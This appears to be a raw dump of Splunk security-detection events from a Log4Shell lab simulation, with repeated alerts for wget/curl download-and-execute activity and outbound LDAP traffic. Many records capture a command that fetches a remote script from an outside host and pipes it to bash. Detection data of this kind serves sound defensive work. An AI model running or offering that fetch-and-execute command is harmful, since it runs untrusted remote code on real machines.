info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", 
parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", 
info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", 
count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", 
annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified 
on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO 
- http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", 
info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool 
Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified 
on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638857, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 12", annotations._all="DE.AE", annotations._all="Actions on Objectives", annotations._all="DE.CM", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1059", annotations._all="T1190", annotations._all="PR.PT", annotations._all="PR.DS", annotations._all="Stage:Initial Access", annotations._all="Command and Control", annotations._all="CIS 13", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", 
annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-19T23:10:20", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642638857, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 12", annotations._all="DE.AE", annotations._all="Actions on Objectives", annotations._all="DE.CM", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1059", annotations._all="T1190", annotations._all="PR.PT", annotations._all="PR.DS", annotations._all="Stage:Initial Access", annotations._all="Command and Control", annotations._all="CIS 13", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", 
annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-19T23:10:20", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. 
This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget 
